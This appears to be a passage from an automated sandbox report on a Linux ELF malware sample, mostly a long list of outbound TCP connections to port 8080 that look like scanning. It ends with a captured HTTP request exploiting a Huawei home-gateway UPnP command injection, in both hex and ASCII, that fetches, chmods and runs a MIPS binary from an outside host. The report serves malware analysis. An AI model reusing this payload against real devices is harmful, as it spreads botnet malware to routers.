    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.204.228.249:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.121.179.43:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.89.231.157:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.49.188.27:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.117.158.239:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.13.209.163:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.21.139.85:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.0.109.102:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.249.121.174:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.197.190.24:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.243.227.219:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.103.89.242:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.124.219.251:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.215.128.27:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.25.190.231:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.137.185.68:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.213.223.30:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.250.46.8:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.15.37.240:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.208.76.94:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.138.122.177:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.216.132.234:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.207.225.165:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.173.58.55:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.174.132.85:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.102.177.232:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.230.9.169:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.192.240.114:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.233.254.251:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.184.147.9:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.101.47.141:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.254.3.174:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.10.217.98:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.240.48.190:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.201.125.94:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.115.96.87:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.240.252.135:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.50.177.188:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.206.55.173:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.206.138.71:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.144.240.188:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.154.232.22:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.74.134.179:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.179.189.240:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.105.188.60:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.178.138.202:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.200.243.25:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.16.235.128:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.234.241.153:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.180.162.116:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.16.209.13:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.81.13.61:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.200.21.120:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.193.129.128:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.30.163.224:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.155.29.251:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.216.58.90:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.85.200.233:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.231.21.17:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.23.38.106:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.236.36.145:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.96.16.195:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.36.0.39:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.133.156.24:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.219.6.229:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.216.19.189:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.152.102.216:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.79.184.29:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.125.137.55:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.2.24.157:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.84.153.156:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.36.184.117:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.220.121.120:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.14.199.205:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.172.232.113:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.5.105.154:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.128.174.32:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.89.175.231:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.93.27.82:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.210.59.220:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.192.225.49:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.103.15.112:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.35.109.92:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.167.216.251:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.231.53.152:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.128.240.40:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.126.38.4:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.13.31.110:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.253.46.224:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.208.85.200:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.24.136.124:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.21.99.116:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.3.98.181:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.254.177.144:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.222.87.84:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.52.186.11:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.208.191.159:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.183.205.224:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.230.138.165:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.186.59.5:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.93.107.38:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.10.39.150:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.56.46.33:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.78.108.161:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.122.60.38:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.90.23.180:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.198.212.72:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.105.126.250:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.124.172.178:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.120.201.240:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.255.243.125:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.7.117.92:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.125.39.147:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.160.153.26:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.184.55.159:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.255.135.221:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.241.143.44:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.148.200.137:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.123.160.47:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.142.150.129:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.40.20.19:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.205.248.129:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.241.38.99:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.173.211.117:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.230.182.246:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.11.202.141:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.215.134.227:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.210.32.213:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.170.177.216:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.204.125.239:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.129.247.139:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.163.113.63:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.173.198.98:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.104.23.8:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.119.196.163:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.127.254.218:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.19.47.180:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.229.151.239:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.81.44.47:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.169.210.160:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.66.179.25:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.220.121.234:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.47.48.51:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.232.37.221:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.77.218.138:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.160.245.106:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.62.57.179:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.75.76.46:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.17.148.158:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.44.144.73:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.82.150.139:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.251.230.104:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.175.30.14:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.78.159.73:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.195.164.10:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.235.117.100:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.234.227.166:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.144.13.193:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.4.137.118:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.124.25.8:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.108.85.51:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.156.48.255:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.31.192.246:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.220.130.11:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.26.168.166:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.230.23.32:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.187.121.88:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.42.139.253:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.159.6.189:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.57.192.35:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.130.153.3:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.116.122.226:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.35.67.57:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.227.69.92:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.35.102.97:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.31.12.184:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.56.38.216:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.184.58.81:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.6.247.10:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.70.185.168:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.53.236.215:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.230.196.148:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.79.74.57:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.209.40.111:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.83.113.214:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.197.114.40:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.124.121.208:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.56.222.233:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.90.42.164:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.73.31.69:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.108.177.239:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.231.60.223:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.22.18.189:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.253.124.228:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.26.63.70:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.132.148.219:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.17.45.108:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.140.129.238:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.172.240.192:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.140.69.135:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.3.204.67:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.49.81.130:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.208.10.151:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.242.238.75:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.188.163.105:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.13.216.162:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.246.99.173:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.176.68.160:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.219.209.75:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.87.149.36:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.250.202.190:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.34.84.233:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.103.156.197:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.156.247.165:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.29.19.84:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.17.216.97:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.210.228.196:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.120.30.129:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.128.39.209:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.155.7.135:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.94.222.243:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.149.25.123:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.150.244.220:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.44.41.134:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.119.184.181:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.151.226.179:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.50.161.218:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.166.251.203:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.109.54.169:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.36.54.171:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.141.44.227:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.203.229.58:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.100.234.56:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.218.111.156:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.70.2.32:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.168.68.122:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.1.22.70:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.253.12.130:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.37.63.58:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.190.233.88:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.188.8.69:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.18.144.140:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.89.126.216:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.242.152.11:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.210.195.193:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.162.196.254:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.146.196.134:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.153.114.111:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.86.121.8:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.183.37.17:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.165.113.20:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.186.78.165:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.154.214.50:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.59.179.20:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.154.69.74:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.14.54.184:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.232.197.153:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.240.28.185:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.225.244.223:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.2.57.27:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.107.39.72:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.34.230.177:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.240.200.37:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.22.131.0:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.106.176.143:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.99.127.172:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.38.117.157:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.176.221.68:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.228.119.159:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.58.152.140:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.25.110.211:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.165.199.235:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.170.255.215:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.50.117.251:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.14.167.229:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.33.49.196:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.230.47.195:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.5.128.138:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.120.157.36:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.83.95.174:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.84.232.26:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.133.58.198:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 95.190.33.134:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.233.244.51:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.77.194.115:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.135.22.143:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.50.39.216:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.74.108.79:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.249.234.2:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.208.222.152:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.191.42.14:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.93.115.39:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.222.251.146:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.161.246.159:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.158.61.29:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.151.46.3:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.68.85.25:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.178.181.67:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.200.30.104:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.4.96.113:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 85.209.149.101:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.200.64.59:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.93.223.230:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.164.27.69:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.166.242.75:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.125.79.229:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 94.225.233.157:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 31.196.245.250:8080
    Source: global trafficTCP traffic: 192.168.2.13:54202 -> 62.93.68.138:8080
    Source: /tmp/7Ueun89KE3.elf (PID: 5421)Socket: 0.0.0.0::0Jump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)Socket: 0.0.0.0::0Jump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)Socket: 0.0.0.0::53413Jump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)Socket: 0.0.0.0::80Jump to behavior
    Source: /tmp/7Ueun89KE3.elf (PID: 5427)Socket: 0.0.0.0::37215Jump to behavior
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
